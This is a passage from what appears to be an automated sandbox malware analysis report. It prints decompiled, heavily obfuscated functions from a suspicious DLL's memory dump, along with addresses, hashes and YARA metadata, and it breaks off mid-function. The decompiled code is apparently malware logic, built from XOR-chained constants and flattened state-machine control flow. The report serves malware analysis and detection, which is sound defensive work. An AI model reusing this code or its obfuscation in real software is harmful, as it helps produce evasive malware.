                                                                        0x10004abb
                                                                        0x10004ac3
                                                                        0x10004acb
                                                                        0x10004ade
                                                                        0x10004ae2
                                                                        0x10004aea
                                                                        0x10004af2
                                                                        0x10004afa
                                                                        0x10004aff
                                                                        0x10004b07
                                                                        0x10004b0f
                                                                        0x10004b17
                                                                        0x10004b1f
                                                                        0x10004b27
                                                                        0x10004b2f
                                                                        0x10004b37
                                                                        0x10004b3c
                                                                        0x10004b44
                                                                        0x10004b4c
                                                                        0x10004b54
                                                                        0x10004b5c
                                                                        0x10004b64
                                                                        0x10004b6c
                                                                        0x10004b74
                                                                        0x10004b74
                                                                        0x10004b7e
                                                                        0x10004b9f
                                                                        0x10004ba4
                                                                        0x10004ba7
                                                                        0x10004bac
                                                                        0x00000000
                                                                        0x10004b80
                                                                        0x10004b86
                                                                        0x10004b88
                                                                        0x00000000
                                                                        0x10004b88
                                                                        0x10004b86
                                                                        0x00000000
                                                                        0x10004b7e
                                                                        0x10004bc4
                                                                        0x10004bc9
                                                                        0x10004bcc
                                                                        0x10004bce
                                                                        0x10004bd0
                                                                        0x10004bd0
                                                                        0x10004bdd

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (E$Z_$p3
                                                                        • API String ID: 0-2346288438
                                                                        • Opcode ID: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
                                                                        • Instruction ID: 7908451ff43d398edfe4d3dd47729a6452d00dfb1cbc6f0b7171fbae9ac85e7f
                                                                        • Opcode Fuzzy Hash: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
                                                                        • Instruction Fuzzy Hash: 924147B15083419BE358CE24C54A41FFBE1FBD8798F150E1DF599A6260D7B8CA098B8B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10014E4B, Relevance: 2.7, Strings: 2, Instructions: 164COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E10014E4B(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				void* _t128;
				void* _t138;
				signed int _t141;
				intOrPtr _t143;
				signed int _t144;
				void* _t147;
				intOrPtr* _t148;
				void* _t162;
				signed int _t163;

				_push(_a12);
				_t162 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(0x40);
				_push(__ecx);
				E100056B2(_t128);
				_v20 = 0x10;
				_v32 = 0xa61f;
				_v32 = _v32 + 0xa8ad;
				_t144 = 0;
				_v32 = _v32 ^ 0x00012e5d;
				_t147 = 0x2817a0c8;
				_v36 = 0xad73;
				_t163 = 0x7d;
				_v36 = _v36 * 0x18;
				_v36 = _v36 ^ 0x00106704;
				_v28 = 0xa63d;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x00001262;
				_v76 = 0xc830;
				_v76 = _v76 + 0xffffcf51;
				_v76 = _v76 ^ 0x61a5e6c8;
				_v76 = _v76 + 0xffffd3c1;
				_v76 = _v76 ^ 0x61a52b9a;
				_v60 = 0xaf2b;
				_v60 = _v60 + 0xffff794e;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0x0050bd44;
				_v72 = 0xd683;
				_v72 = _v72 * 0x4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 + 0x8cf4;
				_v72 = _v72 ^ 0x00017a15;
				_v48 = 0x2f64;
				_v48 = _v48 + 0x8745;
				_v48 = _v48 >> 9;
				_v48 = _v48 ^ 0x00003344;
				_v52 = 0xde80;
				_v52 = _v52 >> 8;
				_v52 = _v52 + 0xe2ec;
				_v52 = _v52 ^ 0x0000cf48;
				_v24 = 0x26fb;
				_v24 = _v24 ^ 0x99bfc1a1;
				_v24 = _v24 ^ 0x99bffb6f;
				_v56 = 0x40f3;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x9a684b3f;
				_v56 = _v56 ^ 0x9a60118c;
				_v64 = 0xe209;
				_v64 = _v64 / _t163;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0xdf73d75b;
				_v64 = _v64 ^ 0xdf73ad9f;
				_v40 = 0xf4ff;
				_v40 = _v40 << 1;
				_v40 = _v40 * 0x32;
				_v40 = _v40 ^ 0x005fe217;
				_v68 = 0xde81;
				_v68 = _v68 + 0xc2e0;
				_v68 = _v68 << 0xc;
				_v68 = _v68 >> 0xc;
				_v68 = _v68 ^ 0x0001df05;
				_v44 = 0x9d75;
				_v44 = _v44 ^ 0xc94ec8c4;
				_v44 = _v44 ^ 0xe16feb53;
				_v44 = _v44 ^ 0x2821dabf;
				do {
					while(_t147 != 0x479232b) {
						if(_t147 == 0x1eeae304) {
							__eflags = E1001C901(_v32,  &_v16,  &_v20, _v36);
							if(__eflags != 0) {
								_t147 = 0x479232b;
								continue;
							}
						} else {
							if(_t147 == 0x264c2085) {
								_push(_v60);
								_push(_v76);
								_t138 = E10012164(0x10001270, _v28, __eflags);
								_t141 = E1000DBE9(_v48, __eflags, _v52, _v24, _t162, E10008CA3(__eflags), 0x40,  &_v16, _v56);
								__eflags = _t141;
								_t126 = _t141 > 0;
								__eflags = _t126;
								_t144 = 0 | _t126;
								E1001C5F7(_v64, _v40, _v68, _v44, _t138);
							} else {
								if(_t147 != 0x2817a0c8) {
									goto L18;
								} else {
									_t147 = 0x1eeae304;
									continue;
								}
							}
						}
						L21:
						return _t144;
					}
					_t148 =  &_v16;
					__eflags = _v16 - _t144;
					if(_v16 != _t144) {
						do {
							_t143 =  *_t148;
							__eflags = _t143 - 0x30;
							if(_t143 < 0x30) {
								L11:
								__eflags = _t143 - 0x61;
								if(_t143 < 0x61) {
									L13:
									__eflags = _t143 - 0x41;
									if(_t143 < 0x41) {
										L15:
										 *_t148 = 0x58;
									} else {
										__eflags = _t143 - 0x5a;
										if(_t143 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t143 - 0x7a;
									if(_t143 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t143 - 0x39;
								if(_t143 > 0x39) {
									goto L11;
								}
							}
							_t148 = _t148 + 1;
							__eflags =  *_t148 - _t144;
						} while ( *_t148 != _t144);
					}
					_t147 = 0x264c2085;
					L18:
					__eflags = _t147 - 0xaeeb649;
				} while (__eflags != 0);
				goto L21;
			}




























                                                                        0x10014e52
                                                                        0x10014e56
                                                                        0x10014e58
                                                                        0x10014e5c
                                                                        0x10014e60
                                                                        0x10014e62
                                                                        0x10014e63
                                                                        0x10014e68
                                                                        0x10014e73
                                                                        0x10014e7d
                                                                        0x10014e85
                                                                        0x10014e87
                                                                        0x10014e8f
                                                                        0x10014e94
                                                                        0x10014ea8
                                                                        0x10014ea9
                                                                        0x10014ead
                                                                        0x10014eb5
                                                                        0x10014ebd
                                                                        0x10014ec2
                                                                        0x10014eca
                                                                        0x10014ed2
                                                                        0x10014eda
                                                                        0x10014ee2
                                                                        0x10014eea
                                                                        0x10014ef2
                                                                        0x10014efa
                                                                        0x10014f02
                                                                        0x10014f07
                                                                        0x10014f0f
                                                                        0x10014f1c
                                                                        0x10014f20
                                                                        0x10014f25
                                                                        0x10014f2d
                                                                        0x10014f35
                                                                        0x10014f3d
                                                                        0x10014f45
                                                                        0x10014f4a
                                                                        0x10014f52
                                                                        0x10014f5a
                                                                        0x10014f5f
                                                                        0x10014f67
                                                                        0x10014f6f
                                                                        0x10014f77
                                                                        0x10014f7f
                                                                        0x10014f87
                                                                        0x10014f8f
                                                                        0x10014f94
                                                                        0x10014f9c
                                                                        0x10014fa4
                                                                        0x10014fb7
                                                                        0x10014fbb
                                                                        0x10014fc0
                                                                        0x10014fc8
                                                                        0x10014fd0
                                                                        0x10014fd8
                                                                        0x10014fe1
                                                                        0x10014fe5
                                                                        0x10014fed
                                                                        0x10014ff5
                                                                        0x10014ffd
                                                                        0x10015002
                                                                        0x10015007
                                                                        0x1001500f
                                                                        0x10015017
                                                                        0x1001501f
                                                                        0x10015027
                                                                        0x1001502f
                                                                        0x1001502f
                                                                        0x10015035
                                                                        0x10015063
                                                                        0x10015065
                                                                        0x1001506b
                                                                        0x00000000
                                                                        0x1001506b
                                                                        0x10015037
                                                                        0x1001503d
                                                                        0x100150aa
                                                                        0x100150b3
                                                                        0x100150bb
                                                                        0x100150e6
                                                                        0x100150f2
                                                                        0x100150fc
                                                                        0x100150fc
                                                                        0x100150fc
                                                                        0x10015103
                                                                        0x1001503f
                                                                        0x10015045
                                                                        0x00000000
                                                                        0x10015047
                                                                        0x10015047
                                                                        0x00000000
                                                                        0x10015047
                                                                        0x10015045
                                                                        0x1001503d
                                                                        0x1001510e
                                                                        0x10015114
                                                                        0x10015114
                                                                        0x1001506f
                                                                        0x10015073
                                                                        0x10015077
                                                                        0x10015079
                                                                        0x10015079
                                                                        0x1001507b
                                                                        0x1001507d
                                                                        0x10015083
                                                                        0x10015083
                                                                        0x10015085
                                                                        0x1001508b
                                                                        0x1001508b
                                                                        0x1001508d
                                                                        0x10015093
                                                                        0x10015093
                                                                        0x1001508f
                                                                        0x1001508f
                                                                        0x10015091
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10015091
                                                                        0x10015087
                                                                        0x10015087
                                                                        0x10015089
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10015089
                                                                        0x1001507f
                                                                        0x1001507f
                                                                        0x10015081
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10015081
                                                                        0x10015096
                                                                        0x10015097
                                                                        0x10015097
                                                                        0x10015079
                                                                        0x1001509b
                                                                        0x100150a0
                                                                        0x100150a0
                                                                        0x100150a0
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D3$So
                                                                        • API String ID: 0-1798533957
                                                                        • Opcode ID: f8f88fcedb07124a3c2552d532e28816b7cee94d3e288d1335ce9db65d1f1dfa
                                                                        • Instruction ID: a36dc09e0a722225465dbaf5dc1fbc69e17eb54196c5202d43f44068f2dc291a
                                                                        • Opcode Fuzzy Hash: f8f88fcedb07124a3c2552d532e28816b7cee94d3e288d1335ce9db65d1f1dfa
                                                                        • Instruction Fuzzy Hash: 3D7164710093419FD355CE60C88990FBBE1FBC5788F40491DF1969A2A1D3B6DA8ACF87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10011B71, Relevance: 2.7, Strings: 2, Instructions: 164COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E10011B71(intOrPtr* __ecx, void* __edx, signed int _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t130;
				signed int _t156;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t163;
				intOrPtr* _t180;
				signed int* _t181;
				signed int* _t184;

				_t181 = _a4;
				_push(_a8);
				_t180 = __ecx;
				_push(_t181);
				_push(__ecx);
				E100056B2(_t130);
				_a4 = 0x4753;
				_t184 =  &(( &_v100)[4]);
				_a4 = _a4 >> 4;
				_t163 = 0x1ce4a29c;
				_t158 = 0x7b;
				_a4 = _a4 / _t158;
				_a4 = _a4 + 0xffff71bd;
				_a4 = _a4 ^ 0xffff4206;
				_v72 = 0xd68c;
				_t159 = 5;
				_v72 = _v72 * 0x66;
				_v72 = _v72 ^ 0x00552ab5;
				_v56 = 0xc5bd;
				_v56 = _v56 * 0x1e;
				_v56 = _v56 ^ 0x00172fa5;
				_v96 = 0x2782;
				_v96 = _v96 << 5;
				_v96 = _v96 >> 2;
				_v96 = _v96 / _t159;
				_v96 = _v96 ^ 0x00004dd3;
				_v60 = 0xbb2b;
				_v60 = _v60 ^ 0x9bc1f403;
				_v60 = _v60 ^ 0x9bc17fed;
				_v64 = 0x890;
				_t160 = 0x79;
				_v64 = _v64 / _t160;
				_v64 = _v64 ^ 0x00001224;
				_v68 = 0xd52d;
				_v68 = _v68 | 0x66ad6dc2;
				_v68 = _v68 ^ 0x66addc3f;
				_v80 = 0x2d15;
				_v80 = _v80 ^ 0xe1b04c0e;
				_v80 = _v80 | 0x8df21731;
				_v80 = _v80 ^ 0xedf2018b;
				_v84 = 0x4d41;
				_v84 = _v84 + 0xffffece7;
				_v84 = _v84 ^ 0xe6ee3790;
				_v84 = _v84 * 0x66;
				_v84 = _v84 ^ 0x02d92ffd;
				_v76 = 0x5bdd;
				_v76 = _v76 * 0x72;
				_v76 = _v76 << 0xf;
				_v76 = _v76 ^ 0x7435051d;
				_v88 = 0x9998;
				_v88 = _v88 * 0xf;
				_v88 = _v88 << 3;
				_v88 = _v88 + 0xffff20a8;
				_v88 = _v88 ^ 0x004709cc;
				_v92 = 0xdec6;
				_v92 = _v92 >> 0xc;
				_v92 = _v92 ^ 0x867abd03;
				_v92 = _v92 * 0x46;
				_v92 = _v92 ^ 0xc58fdc4c;
				_v100 = 0x13e8;
				_v100 = _v100 << 9;
				_v100 = _v100 * 0x42;
				_v100 = _v100 + 0xff79;
				_v100 = _v100 ^ 0x0a449f79;
				do {
					while(_t163 != 0x2937ce5) {
						if(_t163 == 0x183d422a) {
							E10018582(_v84, _t180 + 4, __eflags, _v76,  &_v52, _v88, _v92);
						} else {
							if(_t163 == 0x1ce4a29c) {
								_t163 = 0x35771045;
								 *_t181 =  *_t181 & 0x00000000;
								_t181[1] = _v100;
								continue;
							} else {
								if(_t163 == 0x1ed204aa) {
									E1000CD04(_v64,  *_t180, _v68,  &_v52, _v80);
									_t184 =  &(_t184[3]);
									_t163 = 0x183d422a;
									continue;
								} else {
									if(_t163 == 0x3303492c) {
										_push(_t163);
										_t156 = E100157E8(_t181[1]);
										 *_t181 = _t156;
										__eflags = _t156;
										if(__eflags != 0) {
											_t163 = 0x2937ce5;
											continue;
										}
									} else {
										if(_t163 != 0x35771045) {
											goto L13;
										} else {
											_t181[1] = E10004A2B(_t180);
											_t163 = 0x3303492c;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t181;
						_t129 =  *_t181 != 0;
						__eflags = _t129;
						return 0 | _t129;
					}
					E1001F3E9(_v56, _v96, _v60, _t181,  &_v52);
					_t184 =  &(_t184[3]);
					_t163 = 0x1ed204aa;
					L13:
					__eflags = _t163 - 0x1f54ddf;
				} while (__eflags != 0);
				goto L16;
			}

























                                                                        0x10011b77
                                                                        0x10011b7c
                                                                        0x10011b80
                                                                        0x10011b82
                                                                        0x10011b84
                                                                        0x10011b85
                                                                        0x10011b8a
                                                                        0x10011b95
                                                                        0x10011b98
                                                                        0x10011ba3
                                                                        0x10011baa
                                                                        0x10011baf
                                                                        0x10011bb5
                                                                        0x10011bbd
                                                                        0x10011bc5
                                                                        0x10011bd2
                                                                        0x10011bd5
                                                                        0x10011bd9
                                                                        0x10011be1
                                                                        0x10011bee
                                                                        0x10011bf2
                                                                        0x10011bfa
                                                                        0x10011c02
                                                                        0x10011c07
                                                                        0x10011c14
                                                                        0x10011c18
                                                                        0x10011c20
                                                                        0x10011c28
                                                                        0x10011c30
                                                                        0x10011c38
                                                                        0x10011c44
                                                                        0x10011c47
                                                                        0x10011c4b
                                                                        0x10011c53
                                                                        0x10011c5b
                                                                        0x10011c63
                                                                        0x10011c6b
                                                                        0x10011c73
                                                                        0x10011c7b
                                                                        0x10011c83
                                                                        0x10011c8b
                                                                        0x10011c93
                                                                        0x10011c9b
                                                                        0x10011ca8
                                                                        0x10011cac
                                                                        0x10011cb4
                                                                        0x10011cc1
                                                                        0x10011cc5
                                                                        0x10011cca
                                                                        0x10011cd2
                                                                        0x10011cdf
                                                                        0x10011ce3
                                                                        0x10011ce8
                                                                        0x10011cf0
                                                                        0x10011cf8
                                                                        0x10011d00
                                                                        0x10011d05
                                                                        0x10011d12
                                                                        0x10011d16
                                                                        0x10011d23
                                                                        0x10011d30
                                                                        0x10011d3a
                                                                        0x10011d3e
                                                                        0x10011d46
                                                                        0x10011d4e
                                                                        0x10011d4e
                                                                        0x10011d5c
                                                                        0x10011e2e
                                                                        0x10011d62
                                                                        0x10011d68
                                                                        0x10011ddc
                                                                        0x10011dde
                                                                        0x10011de1
                                                                        0x00000000
                                                                        0x10011d6a
                                                                        0x10011d70
                                                                        0x10011dc6
                                                                        0x10011dcb
                                                                        0x10011dce
                                                                        0x00000000
                                                                        0x10011d72
                                                                        0x10011d78
                                                                        0x10011d9b
                                                                        0x10011d9f
                                                                        0x10011da4
                                                                        0x10011da7
                                                                        0x10011da9
                                                                        0x10011daf
                                                                        0x00000000
                                                                        0x10011daf
                                                                        0x10011d7a
                                                                        0x10011d7c
                                                                        0x00000000
                                                                        0x10011d82
                                                                        0x10011d89
                                                                        0x10011d8c
                                                                        0x00000000
                                                                        0x10011d8c
                                                                        0x10011d7c
                                                                        0x10011d78
                                                                        0x10011d70
                                                                        0x10011d68
                                                                        0x10011e36
                                                                        0x10011e38
                                                                        0x10011e3d
                                                                        0x10011e3d
                                                                        0x10011e44
                                                                        0x10011e44
                                                                        0x10011dfb
                                                                        0x10011e00
                                                                        0x10011e03
                                                                        0x10011e08
                                                                        0x10011e08
                                                                        0x10011e08
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AM$SG
                                                                        • API String ID: 0-2359636636
                                                                        • Opcode ID: 335b760aecf9311ccc4c76b46dd11e98044fb8b6b4e5fe0ea9c494827d2a9ad0
                                                                        • Instruction ID: 73a1d719dcb80061ca56764ad851f481a03b11d3d12b559eb37b6c303cc90ad2
                                                                        • Opcode Fuzzy Hash: 335b760aecf9311ccc4c76b46dd11e98044fb8b6b4e5fe0ea9c494827d2a9ad0
                                                                        • Instruction Fuzzy Hash: 807147B15083429FD368CF21D48645FBBE1FBC4348F504A1EF5968A260D375DA89CF82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001C6AD, Relevance: 2.6, Strings: 2, Instructions: 148COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E1001C6AD(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char _v328;
				char _t161;
				signed int _t164;
				void* _t167;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				char* _t174;
				intOrPtr* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_v40 = 0xfa39;
				_v40 = _v40 + 0xdb01;
				_v40 = _v40 + 0xffffe592;
				_v40 = _v40 ^ 0x0001c62b;
				_v68 = 0xbea4;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 ^ 0x00007ac8;
				_v36 = 0x4356;
				_v36 = _v36 >> 0x10;
				_v36 = _v36 >> 4;
				_v36 = _v36 ^ 0x00002e98;
				_v12 = 0xe2d2;
				_v12 = _v12 >> 6;
				_v12 = _v12 + 0xffff2c83;
				_t193 = __ecx;
				_v12 = _v12 * 0x62;
				_v12 = _v12 ^ 0xffb02725;
				_v16 = 0xb4cd;
				_v16 = _v16 >> 9;
				_v16 = _v16 | 0xafffddff;
				_v16 = _v16 ^ 0xafffea00;
				_v8 = 0x68cb;
				_v8 = _v8 | 0xb32e4b28;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x0d8dd4c4;
				_v8 = _v8 ^ 0x38786c55;
				_v48 = 0xfb83;
				_v48 = _v48 | 0x7a1a2a9c;
				_v48 = _v48 ^ 0x7a1ab4a3;
				_v20 = 0x79fd;
				_t169 = 3;
				_v20 = _v20 / _t169;
				_v20 = _v20 + 0x1426;
				_t170 = 0x65;
				_v20 = _v20 / _t170;
				_v20 = _v20 ^ 0x00003bd3;
				_v28 = 0xa065;
				_t171 = 0x78;
				_v28 = _v28 / _t171;
				_v28 = _v28 | 0x67e4385d;
				_v28 = _v28 ^ 0x67e41ce2;
				_v52 = 0xcb25;
				_v52 = _v52 | 0x001bc1db;
				_v52 = _v52 ^ 0x001ba08f;
				_v60 = 0xfe76;
				_v60 = _v60 + 0xffff45c9;
				_v60 = _v60 ^ 0x00003b0c;
				_v32 = 0xb195;
				_v32 = _v32 + 0xffff6114;
				_v32 = _v32 << 6;
				_v32 = _v32 ^ 0x0004e941;
				_v24 = 0xa461;
				_v24 = _v24 >> 0xd;
				_t172 = 0x2a;
				_v24 = _v24 / _t172;
				_v24 = _v24 * 0x41;
				_v24 = _v24 ^ 0x00004365;
				_v64 = 0x6361;
				_t173 = 0x6a;
				_t174 =  &_v328;
				_v64 = _v64 / _t173;
				_v64 = _v64 ^ 0x00000cc9;
				_v56 = 0x48bf;
				_v56 = _v56 ^ 0x5ae3b612;
				_v56 = _v56 ^ 0x5ae38705;
				_v44 = 0xaf17;
				_v44 = _v44 | 0xd3b2bd8d;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x7657b8ea;
				while(1) {
					_t161 =  *_t193;
					if(_t161 == 0) {
						break;
					}
					if(_t161 == 0x2e) {
						 *_t174 = 0;
					} else {
						 *_t174 = _t161;
						_t174 = _t174 + 1;
						_t193 = _t193 + 1;
						continue;
					}
					L6:
					_t194 = E10015719(_v40, _v68, _v36,  &_v328, _v12);
					_t196 = _t195 + 0xc;
					if(_t194 != 0) {
						L8:
						_t164 = E10010EAE(_t193 + 1, _v28, _v52, _v60, _v32);
						_push(_v44);
						_push(_v56);
						_push(_t194);
						_push(_v64);
						return E10002419(_v24, _t164 ^ 0x165fe069);
					}
					_t167 = E10018DF5( &_v328, _v16, _v8, _v48, _v20);
					_t194 = _t167;
					_t196 = _t196 + 0xc;
					if(_t194 != 0) {
						goto L8;
					}
					return _t167;
				}
				goto L6;
			}

































                                                                        0x1001c6b6
                                                                        0x1001c6bf
                                                                        0x1001c6c6
                                                                        0x1001c6cd
                                                                        0x1001c6d4
                                                                        0x1001c6db
                                                                        0x1001c6df
                                                                        0x1001c6e6
                                                                        0x1001c6ed
                                                                        0x1001c6f1
                                                                        0x1001c6f5
                                                                        0x1001c6fc
                                                                        0x1001c703
                                                                        0x1001c707
                                                                        0x1001c716
                                                                        0x1001c718
                                                                        0x1001c71b
                                                                        0x1001c722
                                                                        0x1001c729
                                                                        0x1001c72d
                                                                        0x1001c734
                                                                        0x1001c73b
                                                                        0x1001c742
                                                                        0x1001c749
                                                                        0x1001c74d
                                                                        0x1001c754
                                                                        0x1001c75b
                                                                        0x1001c762
                                                                        0x1001c769
                                                                        0x1001c770
                                                                        0x1001c77a
                                                                        0x1001c77f
                                                                        0x1001c784
                                                                        0x1001c78e
                                                                        0x1001c793
                                                                        0x1001c798
                                                                        0x1001c79f
                                                                        0x1001c7a9
                                                                        0x1001c7ae
                                                                        0x1001c7b3
                                                                        0x1001c7ba
                                                                        0x1001c7c1
                                                                        0x1001c7c8
                                                                        0x1001c7cf
                                                                        0x1001c7d6
                                                                        0x1001c7dd
                                                                        0x1001c7e4
                                                                        0x1001c7eb
                                                                        0x1001c7f2
                                                                        0x1001c7f9
                                                                        0x1001c7fd
                                                                        0x1001c804
                                                                        0x1001c80b
                                                                        0x1001c812
                                                                        0x1001c817
                                                                        0x1001c81e
                                                                        0x1001c821
                                                                        0x1001c82a
                                                                        0x1001c834
                                                                        0x1001c837
                                                                        0x1001c83d
                                                                        0x1001c840
                                                                        0x1001c847
                                                                        0x1001c84e
                                                                        0x1001c855
                                                                        0x1001c85c
                                                                        0x1001c863
                                                                        0x1001c86a
                                                                        0x1001c86e
                                                                        0x1001c87f
                                                                        0x1001c87f
                                                                        0x1001c883
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c879
                                                                        0x1001c887
                                                                        0x1001c87b
                                                                        0x1001c87b
                                                                        0x1001c87d
                                                                        0x1001c87e
                                                                        0x00000000
                                                                        0x1001c87e
                                                                        0x1001c88a
                                                                        0x1001c8a2
                                                                        0x1001c8a4
                                                                        0x1001c8a9
                                                                        0x1001c8cb
                                                                        0x1001c8da
                                                                        0x1001c8df
                                                                        0x1001c8e7
                                                                        0x1001c8ec
                                                                        0x1001c8ed
                                                                        0x00000000
                                                                        0x1001c8f8
                                                                        0x1001c8bd
                                                                        0x1001c8c2
                                                                        0x1001c8c4
                                                                        0x1001c8c9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c900
                                                                        0x1001c900
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Ulx8$]8g
                                                                        • API String ID: 0-1828074717
                                                                        • Opcode ID: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
                                                                        • Instruction ID: 5bc45f7731ee84d747845716ac0e0d381f413dec0c038b2a0d0c64420890e08a
                                                                        • Opcode Fuzzy Hash: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
                                                                        • Instruction Fuzzy Hash: 95615571D0121DEBEF08CFA0D84A5EEBBB2FF04314F208158D411BA2A4D7B95A59CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001CAA0, Relevance: 2.6, Strings: 2, Instructions: 147COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E1001CAA0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t121;
				void* _t139;
				void* _t143;
				void* _t145;
				void* _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int* _t174;

				_push(_a16);
				_t165 = _a4;
				_t143 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t121);
				_v88 = 0xa345;
				_t174 =  &(( &_v96)[6]);
				_t166 = 0;
				_t145 = 0x388706b5;
				_t167 = 0x17;
				_v88 = _v88 / _t167;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0xb586a132;
				_v88 = _v88 ^ 0xb586a8c9;
				_v68 = 0x3c18;
				_t168 = 0x75;
				_v68 = _v68 / _t168;
				_v68 = _v68 | 0xfaaa2e7e;
				_v68 = _v68 ^ 0xfaaa5d3e;
				_v72 = 0x292c;
				_t169 = 0x30;
				_v72 = _v72 / _t169;
				_t170 = 0x7d;
				_v72 = _v72 / _t170;
				_v72 = _v72 ^ 0x00000df9;
				_v64 = 0xacd5;
				_v64 = _v64 + 0x8377;
				_v64 = _v64 ^ 0x00014058;
				_v92 = 0x91f4;
				_v92 = _v92 ^ 0x59127442;
				_v92 = _v92 ^ 0xd1a3ee64;
				_v92 = _v92 ^ 0x1200e02f;
				_v92 = _v92 ^ 0x9ab1bc65;
				_v76 = 0x8653;
				_v76 = _v76 | 0x93bc935f;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x3bc90d53;
				_v96 = 0x9841;
				_t171 = 0x42;
				_v96 = _v96 / _t171;
				_v96 = _v96 * 0x19;
				_v96 = _v96 * 0x44;
				_v96 = _v96 ^ 0x000f441a;
				_v56 = 0xfe3f;
				_v56 = _v56 + 0xc16;
				_v56 = _v56 ^ 0x000102f3;
				_v60 = 0xb3bd;
